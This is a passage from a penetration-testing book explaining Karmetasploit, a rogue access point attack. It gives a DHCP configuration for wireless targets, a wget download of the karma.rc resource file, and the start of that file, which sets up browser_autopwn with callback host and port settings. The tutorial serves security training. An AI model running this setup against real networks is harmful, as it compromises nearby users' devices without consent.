178
Chapter 12
Karmetasploit is the Metasploit Framework implementation of the
KARMA attack. It implements various “evil” services including DNS, POP3,
IMAP4, SMTP, FTP, SMB, and HTTP. These services accept and respond to
most requests from clients and will serve up all kinds of malicious fun. (The
various modules are in the
modules/auxiliary/server
directory of the Metasploit
root directory.)
Configuration
Karmetasploit requires very little configuration. To begin, we configure a
DHCP server to be used to hand out IP addresses to wireless targets. Back|
Track includes a DHCP server, but we will need to create a custom configura-
tion file for it to use with Karmetasploit, as shown in the following listing:
option domain-name-servers 10.0.0.1;
default-lease-time 60;
max-lease-time 72;
ddns-update-style none;
authoritative;
log-facility local7;
subnet 10.0.0.0 netmask 255.255.255.0 {
range 10.0.0.100 10.0.0.254;
option routers 10.0.0.1;
option domain-name-servers 10.0.0.1;
}
We back up our original
dhcpd.conf
file by entering
cp /etc/dhcp3/dhcpd.conf/
etc/dhcp3/dhcpd.conf.back
, and then we create a new file containing the data
shown at , which will serve addresses in the range of 10.0.0.100 to 10.0.0.254 .
(If you are unfamiliar with DHCP configurations, don’t worry; as long as your
new
dhcpd.conf
looks similar to this it should work fine.)
Next, we download the KARMA resource file, because as of this writing
it’s not included in the regular Metasploit trunk:
root@bt:/opt/metasploit3/msf3#
wget http://www.offensive-security.com/downloads/karma.rc
When we open the KARMA resource file
karma.rc
, we can see the sequence
of events that occur when it runs, as shown here:
root@bt:/opt/metasploit3/msf3#
cat karma.rc
db_connect postgres:toor@127.0.0.1/msfbook
use auxiliary/server/browser_autopwn
setg AUTOPWN_HOST 10.0.0.1
setg AUTOPWN_PORT 55550
setg AUTOPWN_URI /ads
set LHOST 10.0.0.1
set LPORT 45000